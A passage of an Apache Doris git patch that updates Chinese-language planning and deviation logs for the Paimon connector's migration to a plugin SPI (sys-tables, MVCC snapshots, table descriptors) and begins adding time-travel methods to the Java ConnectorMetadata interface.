| 当前状态 | |---|---|---|---|---| +| DV-024 | P5-B4 揭出并修复 B2 遗留缺陷(普通 paimon plugin 表 BE 描述符错型):`PaimonConnectorMetadata` 不 override `buildTableDescriptor`(SPI default 返 null)→ `PluginDrivenExternalTable.toThrift` 走 fallback `SCHEMA_TABLE`(BE `descriptors.cpp:635` 建 `SchemaTableDescriptor`),而 legacy `PaimonExternalTable.toThrift` + sys 表须 `HIVE_TABLE`(`:644` `HiveTableDescriptor`)。B4/T19 加 `buildTableDescriptor` override(`HIVE_TABLE`+`THiveTable`,镜像 legacy + MC `MaxComputeConnectorMetadata.buildTableDescriptor`),**一处修同时正普通表+sys 表**。inert until 翻闸(paimon 未入 `SPI_READY_TYPES`),真值闸=live-e2e BE 描述符 | [tasks/P5 T19](./tasks/P5-paimon-migration.md) / [D-039](./decisions-log.md) | 2026-06-10 | 🟢 已修正(T19,live-e2e 待验)| +| DV-023 | RFC §10(E7 Sys Tables)设计被 P5-B4 取代:RFC §10 的「sys-table = `$`-后缀普通表 + 连接器 `getTableHandle` 内解析后缀 + `listSysTableSuffixes`」**从未实现**;live fe-core 实为 `SysTableResolver`+`NativeSysTable`+`TableIf.getSupportedSysTables/findSysTable`(iceberg + legacy-paimon 共用)。B4 按 [D-039](./decisions-log.md) 复用该 live 机制(连接器 `listSupportedSysTables`+`getSysTableHandle`,fe-core 通用 `PluginDrivenSysExternalTable`),RFC §10 加脚注标 superseded | [01-spi-extensions-rfc.md §10](./01-spi-extensions-rfc.md) / [D-039](./decisions-log.md) | 2026-06-10 | 🟢 已修正(RFC §10 脚注 + D-039)| | DV-022 | P4-T09 §8:fe-common 去 odps 暴露隐藏传递依赖(依赖卫生,非缺陷)——`odps-sdk-core` 此前**传递**为 fe-common 自身 `DorisHttpException`(io.netty) / `GsonUtilsBase`(com.google.protobuf) 提供 jar;删 odps-sdk-core 后编译暴露缺失,故 fe-common/pom 显式补 `netty-all`+`protobuf-java`(parent dependencyManagement 管版本)。设计 §8 原假设「odps 仅服务 MCUtils」不全 | [Batch-D 设计 §8](./tasks/designs/P4-batchD-maxcompute-removal-design.md) / [D-027] | 2026-06-09 | 🟢 已修正(显式声明,`409300a75b8`)| | DV-021 | P4-T3:Batch-D 删除后 4 条 Tier-3 接受项(minor,legacy 已删故现为既定行为,非丢数据,用户定接受不修)——**GAP3** CREATE DB 非-IFNE 远端已存→本地预抛 `ERR_DB_CREATE_EXISTS`(1007);**GAP4** DROP TABLE 非-IF-EXISTS+远端缺→通用 `ERR_UNKNOWN_TABLE`(1109);**GAP9** SHOW PARTITIONS `LIMIT`:sort-then-paginate(vs legacy paginate-then-sort,更合 ORDER-BY-LIMIT);**GAP10** partitions() TVF schema-分区零实例表→返 0 行(vs legacy 抛,in-code 注释声明 intentional) | [Batch-D 红线](./task-list-batchD-redline-gaps.md) | 2026-06-09 | 🟢 已登记(Tier-3 接受)| | DV-020 | P4-T06e FIX-CAST-PUSHDOWN:getSplits 的 limit-suppress wiring + MC 端到端 CAST-strip 无 fe-core 单测(KNOWN-LIMITATION)+ JDBC applyLimit 同类 under-return(OUT-OF-SCOPE 备查)。**① harness gap**:纯静态 `effectiveSourceLimit(limit,stripped)` 已 UT 2 + mutation 2/2(drop-suppression/always-suppress)向红 pin;连接器 `supportsCastPredicatePushdown=false` 已 UT + mutation(false→true 红) pin;但「`getSplits` 据 `filteredToOriginalIndex!=null` 调 `effectiveSourceLimit`」+「`buildRemainingFilter` 对 MC 真剥 CAST conjunct 并保留 BE-only」的端到端 wiring **无 offline 直测**(构造 `PluginDrivenScanNode` 需 harness、本模块缺,同 [DV-015])。覆盖经:strip-when-false 是 fe-core 共享逻辑(JDBC false 分支既覆盖)+ 纯 helper UT/mutation + **live e2e 真值闸**(STRING 列存 `"5"/"05"/" 5"`,`WHERE CAST(code AS INT)=5` 返回全部 3 行 / limit-opt ON+CAST+LIMIT 不 under-return;EXPLAIN 证 CAST 谓词不在下推 filter)。**② OUT-OF-SCOPE(Rule 12 surface)**:JDBC 若 session 关 cast-pushdown 且经 `applyLimit` 推 limit,理论同类 under-return;但 MaxCompute 不 override `applyLimit`(no-op)、F9 的 getSplits limit-param 抑制对 MC 完整,JDBC `applyLimit` 路径非本修范围(pre-existing、非 MC),登记备查、待评估。fail-safe:误关下推退化为多读行交 BE(非丢数据) | [FIX-CAST-PUSHDOWN 设计](./tasks/designs/P4-T06e-FIX-CAST-PUSHDOWN-design.md) / [D-036] | 2026-06-08 | 🟢 已登记(helper+capability UT/mutation;wiring 待 live e2e;JDBC applyLimit 备查)| diff --git a/plan-doc/tasks/P5-paimon-migration.md b/plan-doc/tasks/P5-paimon-migration.md index d34696a2b30755..a620c00cea330e 100644 --- a/plan-doc/tasks/P5-paimon-migration.md +++ b/plan-doc/tasks/P5-paimon-migration.md @@ -7,7 +7,7 @@ ## 元信息 -- **状态**:🟢 进行中(**B3 已完成 2026-06-10**:T11-T15 DDL metadata,连接器 96/0/0/1 绿、checkstyle 0、import-gate 0、**无 fe-core/SPI/api 改动**、3-lens final holistic review=全 READY;D7 签字(authenticator=legacy-parity wrap each DDL call)。下一批 = B4 sys-tables E7 + MVCC E5(gated on B2+B3 全完,现满足)。B0/B1/B2 见阶段日志) +- **状态**:🟢 进行中(**B4 已完成 2026-06-10**:T16-T20 sys-tables E7 + MVCC E5,连接器 124/0/0/1 绿 + fe-core PluginDriven*Test 98+ 绿、checkstyle 0、import-gate 0;D-039 签字(E7 复用 live SysTable 机制,非 RFC §10 [DV-023]);3-lens final holistic review = PARITY/SCOPE READY + 1 ADVERSARIAL BLOCKER(scan-path 丢 forceJni)**已修**(`PluginDrivenScanNode.create` 改走 seam)。下一批 = **B5 MTMV 桥**(gated on B4 全完,现满足)。B0-B3 见阶段日志) - **启动日期**:2026-06-09(recon+设计) - **目标完成**:TBD(估时 ~5-6 周,含 D2-A 的 MTMV/MVCC 桥) - **阻塞**:无(D1=A / D2=A 已签字);分批实现按 B0→B9 启动 @@ -98,11 +98,11 @@ Master plan [§3.6](../00-connector-migration-master-plan.md);策略 = full ad | P5-T13 | 实现 `createTable`/`dropTable`(远端 + per-flavor authenticator;保留 latent remote-vs-local 名 bug 不修)| B3 | C | ✅ | override request-overload `createTable` + handle-based `dropTable`(idempotent ignoreIfNotExists=true);**D7=B:每 DDL call 包 `context.executeAuthenticated`**(读路径不包);remote-vs-local 名 bug 在 SPI 层 moot(请求单名 from `db.getRemoteName()`);`PluginDrivenExternalCatalog` 已 override FE 侧 | | P5-T14 | 实现 `supportsCreateDatabase=true`+`createDatabase`(HMS-only-props gate 读 `session.getCatalogProperties()`)+`dropDatabase(force)` enumerate-loop | B3 | C | ✅ | gate 读注入 `catalogProperties`(= session.getCatalogProperties 同 map,更简)BEFORE auth;`dropDatabase(force)` = enumerate-loop **AND** native cascade(legacy `performDropDb:147-163` belt-and-suspenders,非 MC enumerate-only);createDatabase ignoreIfExists=false(FE 已 short-circuit);MC parity `:466/478` | | P5-T15 | DDL 离线 UT(createDb gate / dropDb force 级联 / createTable schema / IF NOT EXISTS / type gap)| B3 | T | ✅ | 分布 4 新测类(`PaimonTypeMappingToPaimonTest`10 / `PaimonSchemaBuilderTest`10 / `PaimonConnectorMetadataDdlTest`9 / `PaimonConnectorMetadataDbDdlTest`11)+ `RecordingConnectorContext`(failAuth 钉 auth-wrap)+ `RecordingPaimonCatalogOps` DDL 扩;no-mockito,WHY+MUTATION | -| P5-T16 | **新 E7 SPI**:`ConnectorMetadata.listSupportedSysTables`(default emptySet) + `getSysTableHandle`(default empty);保 MC/jdbc/es/trino 不受影响 | B4 | C | ⏳ | greenfield,签名须慎(被未来连接器复用)| -| P5-T17 | paimon 实现 E7:名取 `SystemTableLoader.SYSTEM_TABLES`;`getSysTableHandle` 走 4-arg `Identifier(db,tbl,"main",sysName)`;handle 带 sysName+forceJni;reload fallback | B4 | C | ⏳ | branch="main" 限制保留+文档 | -| P5-T18 | 通用 fe-core `PluginDrivenSysExternalTable extends PluginDrivenExternalTable`(报 PLUGIN_EXTERNAL_TABLE) + `NativeSysTable` factory;override `PluginDrivenExternalTable.getSupportedSysTables/findSysTable` 委托连接器 | B4 | C | ⏳ | 路由经 `PluginDrivenScanNode`,**勿报 PAIMON_EXTERNAL_TABLE** | -| P5-T19 | `PaimonScanPlanProvider` 加 forceJni 分支(binlog/audit_log + 非 DataTable sys 全走 JNI)+ 通用节点 fail-loud 拒 sys 表 scan-params/time-travel;核 BE sys-table `TTableDescriptor`(HIVE_TABLE?) | B4 | C | ⏳ | binlog/audit_log 走 native = 行错(静默)| -| P5-T20 | **首个 E5 消费者**:实现 `beginQuerySnapshot/getSnapshotAt/getSnapshotById`(返 `ConnectorMvccSnapshot(snapshotId)`,空表 -1)+声明 `SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL`;sys 表不得透出 time-travel | B4 | C | ⏳ | | +| P5-T16 | **新 E7 SPI**:`ConnectorMetadata.listSupportedSysTables`(default emptySet) + `getSysTableHandle`(default empty);保 MC/jdbc/es/trino 不受影响 | B4 | C | ✅ | greenfield,签名须慎;**D-039**:复用 live `SysTableResolver` 机制(非 RFC §10,[DV-023]);2 个 `ConnectorTableOps` default no-op,MC/jdbc/es/trino 不受影响 | +| P5-T17 | paimon 实现 E7:名取 `SystemTableLoader.SYSTEM_TABLES`;`getSysTableHandle` 走 4-arg `Identifier(db,tbl,"main",sysName)`;handle 带 sysName+forceJni;reload fallback | B4 | C | ✅ | branch="main" 限制保留+文档;名取 `SystemTableLoader.SYSTEM_TABLES`;复用现有 `getTable(Identifier)` seam 喂 4-arg sys Identifier;sys handle 加 `sysTableName`+`forceJni`(binlog/audit_log)+ lowercase 规范化;共享 `PaimonTableResolver`(metadata+scan 一处 sys-aware reload)| +| P5-T18 | 通用 fe-core `PluginDrivenSysExternalTable extends PluginDrivenExternalTable`(报 PLUGIN_EXTERNAL_TABLE) + `NativeSysTable` factory;override `PluginDrivenExternalTable.getSupportedSysTables/findSysTable` 委托连接器 | B4 | C | ✅ | 路由经 `PluginDrivenScanNode`,**报 PLUGIN_EXTERNAL_TABLE 非 PAIMON**;`PluginDrivenExternalTable` 集中 handle 获取入 `resolveConnectorTableHandle` seam(4 site),sys 子类 override 之喂 sys handle;`getSupportedSysTables` 委托连接器 `listSupportedSysTables`;sys 表 transient 不持久化/不 GSON 注册 | +| P5-T19 | `PaimonScanPlanProvider` 加 forceJni 分支(binlog/audit_log + 非 DataTable sys 全走 JNI)+ 通用节点 fail-loud 拒 sys 表 scan-params/time-travel;核 BE sys-table `TTableDescriptor`(HIVE_TABLE?) | B4 | C | ✅ | binlog/audit_log 走 native = 行错(静默)→ `shouldUseNativeReader(forceJni,...)` gate(ro 仍 native、metadata 表经 non-DataSplit JNI);**核出 BE 描述符**:加 `buildTableDescriptor`→`HIVE_TABLE`(同修普通表 SCHEMA_TABLE fallback 遗留缺陷 [DV-024]);`PluginDrivenScanNode` fail-loud 拒 sys 表 scan-params/time-travel;**最终复审 BLOCKER 已修**:`PluginDrivenScanNode.create` 改走 `resolveConnectorTableHandle` seam(原直调 `getTableHandle` 丢 forceJni)| +| P5-T20 | **首个 E5 消费者**:实现 `beginQuerySnapshot/getSnapshotAt/getSnapshotById`(返 `ConnectorMvccSnapshot(snapshotId)`,空表 -1)+声明 `SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL`;sys 表不得透出 time-travel | B4 | C | ✅ | **inert until B5**(`PluginDrivenExternalTable` 非 MvccTable、零 fe-core 消费方;翻闸 gated on B5 故安全);snapshot 经新 seam(`latestSnapshotId`/`snapshotIdAtOrBefore`/`snapshotExists`,SDK 在 `CatalogBackedPaimonCatalogOps`、fake 在 Recording);sys handle→`Optional.empty`;**SPI 契约 empty-if-none vs legacy throw**(已 doc,B5 消费方 surface 用户错误);`PaimonConnector.getCapabilities` 声明二 flag | | P5-T21 | **GAP-LISTPART-AT-SNAPSHOT**:listPartitions 加 at-snapshot 重载(按 pin 的 snapshotId 列分区);连接器实现;默认保 latest 向后兼容 | B5 | C | ⏳ | 单-pin 不变式前提 | | P5-T22 | fe-core `PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` implements MTMVRelatedTableIf+MTMVBaseTableIf+MvccTable;`loadSnapshot`(beginQuerySnapshot 定 snapshotId + at-snapshot 物化分区集**一次**)| B5 | C | ⏳ | **gated on D2** | | P5-T23 | 子类 MTMV 方法:getTableSnapshot(→MTMVSnapshotIdSnapshot,-1)/getPartitionSnapshot(→MTMVTimestampSnapshot,缺抛 AnalysisException)/getAndCopyPartitionItems(读 pin 非重列)/getPartitionType/getPartitionColumnNames/isPartitionColumnAllowNull(true)/beforeMTMVRefresh(no-op)/getNewestUpdateVersionOrTime(**绕 pin**) | B5 | C | ⏳ | | @@ -212,6 +212,14 @@ B6 (procedure doc no-op, 独立) │ ## 阶段日志(倒序) +### 2026-06-10(B4 实现:sys-tables E7 + MVCC E5,T16-T20;understand workflow 纠偏 → 用户签 D-039;subagent-driven 5 dispatch + 双审/fix-loop + 3-lens final holistic(1 BLOCKER 修)) + +- **understand workflow(6-agent read-only)纠偏 2 处 plan 前提**:① **RFC §10 stale**(其 `$`-后缀-via-`getTableHandle` E7 设计从未落地;live fe-core 用 `SysTableResolver`+`NativeSysTable`+`TableIf.getSupportedSysTables/findSysTable`)→ 用户签 **D-039**(复用 live 机制,[DV-023]);② **T20 MVCC inert until B5**(E5 方法已存在 default-no-op,但 `PluginDrivenExternalTable` 非 `MvccTable`、零 fe-core 消费方、capability 零 reader;翻闸 gated on B5 故 inert capability 安全)→ 用户签「T20 留 B4 作连接器 groundwork」。另核出 **BE 描述符**:legacy paimon(普通+sys)发 `HIVE_TABLE`,而连接器无 `buildTableDescriptor` override → 普通表走 `SCHEMA_TABLE` fallback([DV-024],B2 遗留缺陷,B4/T19 一处修)。 +- **T16**(greenfield E7 SPI):`ConnectorTableOps.listSupportedSysTables`+`getSysTableHandle`(default no-op)。**T17**:`PaimonConnectorMetadata` 实现之(名取 `SystemTableLoader.SYSTEM_TABLES`,4-arg sys `Identifier(db,tbl,"main",sysName)` 复用 `getTable` seam,sys handle 加 `sysTableName`+`forceJni`(binlog/audit_log)+lowercase 规范化);**fix-loop**:抽共享 `PaimonTableResolver`(metadata+scan 一处 sys-aware reload,修 scan-twin 丢 sys-Table BLOCKER)+ Java-serialization round-trip 测。**T18**(fe-core):`PluginDrivenExternalTable` 集中 handle 获取入 `resolveConnectorTableHandle` seam(4 site)+ `getSupportedSysTables` 委托连接器;通用 `PluginDrivenSysTable extends NativeSysTable` + `PluginDrivenSysExternalTable`(报 `PLUGIN_EXTERNAL_TABLE`,transient 不持久化/不 GSON 注册)。**T19**:`shouldUseNativeReader(forceJni,…)` gate(ro 仍 native、metadata 表经 non-DataSplit JNI)+ `buildTableDescriptor`→`HIVE_TABLE`(同修 [DV-024])+ `PluginDrivenScanNode` fail-loud 拒 sys 表 scan-params/time-travel。**T20**:`beginQuerySnapshot/getSnapshotAt/getSnapshotById`(snapshot seam,sys→`Optional.empty`,空表→-1,SPI 契约 empty-if-none vs legacy throw 已 doc)+ `PaimonConnector.getCapabilities`=`SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL`。 +- **3-lens final holistic review**:PARITY=READY、SCOPE=READY、ADVERSARIAL=1 **BLOCKER**——`PluginDrivenScanNode.create` 直调 `metadata.getTableHandle(remoteName)` **绕过** seam → sys 表得普通 handle(forceJni=false)→ binlog/audit_log 走 native 静默错行(inert today,翻闸后 live)。**已修**:`create` 改走 `table.resolveConnectorTableHandle(session,metadata)`(普通表字节等价、sys 表得 sys handle),TDD red→green。其余 MINOR 已接受/出范围(`force_jni_scanner` session var=B2 边界;SDK-delegation 仅 live-e2e 可验;"Plugin" vs "Paimon" 文案;META-INF/ 勿提交)。 +- **验证(主线 firsthand)**:import-gate 0;连接器 `Tests run: 124, Failures: 0, Errors: 0, Skipped: 1`(live);fe-core `PluginDriven*Test` 98-100 绿;checkstyle 0;**无 cutover/B5 泄漏**(paimon 未入 `SPI_READY_TYPES`、GsonUtils/CatalogFactory/PhysicalPlanTranslator 零改、`PluginDrivenExternalTable` 仍非 MvccTable)。**唯一 fe-connector-api 改动 = T16 两 default no-op**。**B4 未提交**(用户控)。 +- **B5/翻闸 reconcile(dormant)**:① T20 inert,B5 须落 `PluginDrivenExternalTable`→MvccTable + `beginQuerySnapshot` 调用 + `ConnectorMvccSnapshotAdapter` 构造;② T19 sys-table fail-loud guard 依赖 B5 把 scan-params/snapshot 接到 `PluginDrivenScanNode`(现可能 dormant);③ `buildTableDescriptor` HIVE_TABLE + MVCC SDK-delegation(DataTable cast/`earlierOrEqualTimeMills`/`tryGetSnapshot`)须 live-e2e 验。 + ### 2026-06-10(B3 实现:DDL metadata,T11-T15;understand workflow 纠偏 1 处 → 用户签 D7=B;subagent-driven 3 dispatch + 双审 + 3-lens final holistic = 全 READY) - **6-agent understand workflow + 主线 firsthand 核读**:T11-T15 plan 备注大体与 code 一致;**纠偏 1 处** → 用户签 **D7=B**(DDL authenticator = legacy parity,每 DDL call 包 `executeAuthenticated`,见开放决策 D7)。另**证实** plan「PluginDrivenExternalCatalog 已 override FE 侧」为真(FE 4 个 DDL 分发 createTable:300/createDb:355/dropDb:387/dropTable:439 已通用接 SPI,MC 已证;闸是 `SPI_READY_TYPES` 成员=B7,非 B3 缺口)。understand workflow 中 2 个 agent 返回退化 stub,由其余 4 agent 全覆盖(cross-verified)。 - **D1(T11+T12)**:`PaimonTypeMapping.toPaimonType(ConnectorType)`(reverse 方向,byte-parity `DorisToPaimonTypeVisitor.atomic`,gap→`DorisConnectorException`,map-key `.copy(false)`,struct id `AtomicInteger(-1)`)+ 新 `PaimonSchemaBuilder.build(request)`(port `toPaimonSchema`,2 故意 safer 偏差:comment fallback、PK drop-blank;非-identity transform→throw)。20 新测。 @@ -269,6 +277,6 @@ B6 (procedure doc no-op, 独立) │ ## 当前阻塞项 -- 无硬阻塞(D1=A / D2=A / D4=A / D5=A / D6=A / D7=B 已签字;**B0 + B1 + B2 + B3 已完成**)。下一 session = **B4**(sys-tables E7 + MVCC E5;gated on B2+B3 全完,现满足):T16 新 E7 SPI(`listSupportedSysTables`/`getSysTableHandle` default-empty)/ T17 paimon 实现 E7 / T18 通用 `PluginDrivenSysExternalTable` / T19 forceJni 分支(binlog/audit_log)/ T20 首个 E5 消费者(`beginQuerySnapshot`/`getSnapshotAt`/`getSnapshotById`)。**注意 T16/T18 是 greenfield SPI 新面(被未来连接器复用,签名须慎)**。**B6**(procedure doc no-op,独立)可随时穿插。B5(MTMV 桥)gated on B4。 -- 翻闸(B7)仍 gated on B2+B3+B4+B5 全完 + live e2e(用户真实 paimon 各 flavor 环境)。**翻闸/live-e2e 硬门**(见阶段日志 B1 条 + 「风险/开放问题」):hms/dlf metastore-client 跨 loader、jdbc driver_url 安全 allow-list、hive-site.xml 文件加载、live createCatalog;**B3 新增 live-e2e 门**:DDL 的 `executeAuthenticated`(D7=B)在 Kerberized HMS/HDFS createTable/dropDatabase 正确性(离线 no-op,须 live 验)+ `lastFileCreationTime` 等 B2 dormant 项——pre-cutover 不可离线测,翻闸前用户须 live 验。 -- 复用资产:`PaimonCatalogFactory`(纯 options/conf 构建器 + `resolveFlavor`,B3 createDatabase HMS-gate 已复用);`PaimonCatalogOps` seam(现含 5 read + 4 DDL,B4 sys-table 可能再扩);`PaimonTypeMapping`(双向);`PaimonSchemaBuilder`;`RecordingPaimonCatalogOps`/`RecordingConnectorContext` 测基建(B4 复用);parity doc 是后续批次 gap 清单 + 翻闸门基准。 +- 无硬阻塞(D1=A / D2=A / D4=A / D5=A / D6=A / D7=B / **D-039 (E7=live SysTable 机制)** 已签字;**B0 + B1 + B2 + B3 + B4 已完成**)。下一 session = **B5 MTMV 桥**(gated on B4 全完,现满足):T21 GAP-LISTPART-AT-SNAPSHOT / T22 fe-core `PaimonPluginDrivenExternalTable` implements MTMVRelatedTableIf+MTMVBaseTableIf+MvccTable + `loadSnapshot` / T23 子类 MTMV 方法 / T24 rehome `PaimonMvccSnapshot` / T25 isPartitionInvalid parity。**B5 须把 B4 inert 的 E5 接活**:`PluginDrivenExternalTable`(或新 paimon 子类)implements MvccTable → 调 `connector.getMetadata().beginQuerySnapshot` 包成 `ConnectorMvccSnapshotAdapter`(现零构造方);并把 scan-params/time-travel 接到 `PluginDrivenScanNode`(T19 sys-table fail-loud guard 现可能 dormant,B5 接活后即生效)。**B6**(procedure doc no-op,独立)可随时穿插。 +- 翻闸(B7)仍 gated on B2+B3+B4+B5 全完 + live e2e(用户真实 paimon 各 flavor 环境)。**翻闸/live-e2e 硬门**(见阶段日志 B1 条 + 「风险/开放问题」):hms/dlf metastore-client 跨 loader、jdbc driver_url 安全 allow-list、hive-site.xml 文件加载、live createCatalog;**B3 门**:DDL 的 `executeAuthenticated`(D7=B)Kerberized 正确性;**B4 新增 live-e2e 门**:① `buildTableDescriptor`→HIVE_TABLE 在 BE 真实 paimon 普通表+sys 表 scan([DV-024],离线只到连接器边界);② MVCC SDK-delegation(`CatalogBackedPaimonCatalogOps` 的 DataTable cast / `earlierOrEqualTimeMills` / `tryGetSnapshot`,离线仅 fake 覆盖);③ binlog/audit_log 真走 JNI(forceJni 端到端)+ snapshots/schemas sys 表查询;④ sys 表 time-travel 真 fail-loud(须 B5 接活 scan-params/snapshot 后)。 +- 复用资产:`PaimonCatalogFactory`;`PaimonCatalogOps` seam(现含 5 read + 4 DDL + 3 snapshot 方法);`PaimonTableResolver`(sys-aware reload,B5 复用);`PaimonTypeMapping`(双向);`PaimonSchemaBuilder`;fe-core `PluginDrivenSysExternalTable`/`PluginDrivenSysTable`(通用 sys 机制,未来 iceberg/hudi 复用);`RecordingPaimonCatalogOps`/`RecordingConnectorContext`/`FakePaimonTable` 测基建(B5 复用);parity doc 是后续批次 gap 清单 + 翻闸门基准。 From 9c72568b2dcd959ecdb3ceca492173d55516af4e Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 10 Jun 2026 18:26:40 +0800 Subject: [PATCH 013/128] [P5-T22~T26,T31~T35] (connector+fe-core) P5 paimon B5+B6: MTMV/MVCC bridge + time-travel + procedure doc no-op MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit B5a (MTMV/MVCC bridge): source-agnostic PluginDrivenMvccExternalTable (MTMVRelatedTableIf+MTMVBaseTableIf+MvccTable, D-042) wiring the B4-inert E5 snapshot SPI; PluginDrivenMvccSnapshot; list-partitions-at-snapshot. B5b (time-travel): scan-pin + AS-OF + tag + branch + @incr across connector (ConnectorTimeTravelSpec, PaimonIncrementalScanParams) and fe-core; holistic review fixes RD-1 (partitioned time-travel empty-universe scan-all guard in PluginDrivenScanNode) + RD-2 (@incr lists-latest partitions/schema). B6/T26: procedure doc no-op — zero migratable code; closed-form reject verified (ExecuteActionFactory:59-62 / CallFunc:42-43). All inert/gated until B7 cutover (paimon NOT yet in SPI_READY_TYPES). Excludes regression-conf.groovy (secrets) + scratch. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/api/ConnectorMetadata.java | 42 +- .../connector/api/ConnectorTableOps.java | 15 + .../api/mvcc/ConnectorMvccSnapshot.java | 16 + .../api/mvcc/ConnectorTimeTravelSpec.java | 196 ++++ ...nnectorMetadataTimeTravelDefaultsTest.java | 89 ++ .../api/mvcc/ConnectorMvccSnapshotTest.java | 74 ++ .../api/mvcc/ConnectorTimeTravelSpecTest.java | 145 +++ .../connector/paimon/PaimonCatalogOps.java | 138 +++ .../connector/paimon/PaimonConnector.java | 2 +- .../paimon/PaimonConnectorMetadata.java | 350 +++++++- .../paimon/PaimonIncrementalScanParams.java | 269 ++++++ .../paimon/PaimonScanPlanProvider.java | 34 +- .../connector/paimon/PaimonTableHandle.java | 108 ++- .../connector/paimon/PaimonTableResolver.java | 28 +- .../connector/paimon/FakePaimonTable.java | 15 +- .../PaimonConnectorMetadataMvccTest.java | 827 ++++++++++++++++- .../PaimonIncrementalScanParamsTest.java | 243 +++++ .../paimon/PaimonScanPlanProviderTest.java | 57 ++ .../PaimonTableHandleScanOptionsTest.java | 329 +++++++ .../paimon/RecordingPaimonCatalogOps.java | 74 ++ .../PluginDrivenExternalDatabase.java | 16 + .../datasource/PluginDrivenExternalTable.java | 12 +- .../PluginDrivenMvccExternalTable.java | 447 ++++++++++ .../datasource/PluginDrivenMvccSnapshot.java | 124 +++ .../datasource/PluginDrivenScanNode.java | 83 ++ .../apache/doris/persist/gson/GsonUtils.java | 3 + .../fake/FakeConnectorPluginTest.java | 10 +- .../PluginDrivenMvccExternalTableTest.java | 841 ++++++++++++++++++ .../PluginDrivenMvccTableFactoryTest.java | 125 +++ .../PluginDrivenScanNodeMvccPinTest.java | 108 +++ ...ginDrivenScanNodePartitionPruningTest.java | 18 + plan-doc/tasks/P5-paimon-migration.md | 57 +- 32 files changed, 4757 insertions(+), 138 deletions(-) create mode 100644 fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorTimeTravelSpec.java create mode 100644 fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorMetadataTimeTravelDefaultsTest.java create mode 100644 fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshotTest.java create mode 100644 fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/mvcc/ConnectorTimeTravelSpecTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParams.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParamsTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTableHandleScanOptionsTest.java create mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java create mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccSnapshot.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccTableFactoryTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeMvccPinTest.java diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorMetadata.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorMetadata.java index 8b2cb38b65fb85..6b1bf79b65de87 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorMetadata.java @@ -19,6 +19,7 @@ import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.doris.connector.api.mvcc.ConnectorTimeTravelSpec; import java.io.Closeable; import java.io.IOException; @@ -62,18 +63,43 @@ default Optional beginQuerySnapshot( return Optional.empty(); } - /** Returns the snapshot at the given wall-clock time, or empty if none. */ - default Optional getSnapshotAt( + /** + * Resolves an explicit time-travel spec (extracted from {@code FOR TIME AS OF} / + * {@code FOR VERSION AS OF}, or the {@code @tag} / {@code @branch} / {@code @incr} + * scan params) into a pinned snapshot. + * + *

    The connector owns all provider-specific parsing of {@code spec} (snapshot-id + * lookup, datetime parsing, tag/branch resolution, incremental-window validation). + * The returned snapshot's {@link ConnectorMvccSnapshot#getProperties()} carries the + * connector's scan options and its {@link ConnectorMvccSnapshot#getSchemaId()} is the + * resolved schema version.

    + * + *

    Returns {@link Optional#empty()} when the spec is unsupported or the target is not + * found, in which case the engine surfaces a user error. The default returns empty: + * connectors without time-travel do not honor explicit specs.

    + */ + default Optional resolveTimeTravel( ConnectorSession session, ConnectorTableHandle handle, - long timestampMillis) { + ConnectorTimeTravelSpec spec) { return Optional.empty(); } - /** Returns the snapshot with the given id, or empty if none. */ - default Optional getSnapshotById( - ConnectorSession session, ConnectorTableHandle handle, - long snapshotId) { - return Optional.empty(); + /** + * Threads a pinned MVCC / time-travel {@code snapshot} into the table handle BEFORE + * {@code planScan}, so an MVCC-capable connector can return a handle that reads at that + * snapshot (mirrors the {@code applyFilter} / {@code applyProjection} handle-update pattern). + * + *

    Contract for MVCC connectors: thread the FULL {@code snapshot.getProperties()} + * (the scan-options map) into the returned handle so the read path sees exactly the + * connector-resolved options. When {@code properties} is empty, fall back to setting + * {@code scan.snapshot-id = snapshot.getSnapshotId()} (latest-pin parity).

    + * + *

    The default returns {@code handle} unchanged: connectors without time-travel ignore the + * pin and read whatever is current.

    + */ + default ConnectorTableHandle applySnapshot(ConnectorSession session, + ConnectorTableHandle handle, ConnectorMvccSnapshot snapshot) { + return handle; // default: connectors without time-travel ignore the pin } @Override diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java index 056f8f315d7c9d..c397a0e18d7b2d 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java @@ -20,6 +20,7 @@ import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import 